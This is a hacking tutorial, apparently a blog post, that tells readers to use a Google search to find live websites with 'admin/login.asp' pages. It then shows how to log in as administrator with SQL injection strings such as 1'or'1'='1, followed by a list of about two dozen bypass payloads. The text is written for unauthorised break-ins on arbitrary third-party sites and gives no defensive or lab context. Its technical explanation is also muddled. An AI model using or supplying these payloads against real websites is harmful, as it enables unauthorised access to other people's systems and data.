Basic SQL Injection with List of all Possible Passwords

Hi! After long time break, today I came up with an simple tutorial on Basic SQL Injection in which we are trying to gain admin access by hit and trial method- All Possible SQL Injections! Previously I had also written an beautiful post on How to Hack Websites Using Havij. Well A SQL injection injects a code into the MYSQL database which gets passed the site security login. So after getting so much response, I decided to wrote this article and even a child can perform this method. In this, we will take help of Google Search Engine and then find admin login URL’s and lastly inject SQL passwords. That’s it! Please have a look.

Hack Website Admin Account: Basic SQL Injection Attack

1. First of all Google admin/login.asp and do a complete search.

2. Now you can see in the above picture, we are looking for the websites that look like this and ends with admin/login.asp

3. Click on any of the websites as you founded above and login with this-

Username : admin

Password : 1'or'1'='1

4. Well done!! Your now logged in as ADMIN Successfully. Hence do what you want.

5. If Password is not working then please try the following-

List of injections:

       1'or'1'='1
       ' or 0=0 --
       " or 0=0 --
       or 0=0 --
       ' or 0=0 #
       " or 0=0 #
       or 0=0 #
       ' or 'x'='x
       " or "x"="x
       ') or ('x'='x
       ' or 1=1--
       " or 1=1--
       or 1=1--
       ' or a=a--
       " or "a"="a
       ') or ('a'='a
       ") or ("a"="a
       hi" or "a"="a
       hi" or 1=1 --
       hi' or 1=1 --
       hi' or 'a'='a
       hi') or ('a'='a
       hi") or ("a"="a

Note- If any website has applied login limits, then this method might gets failed.

All Done! Enjoy Hacking and Must Share!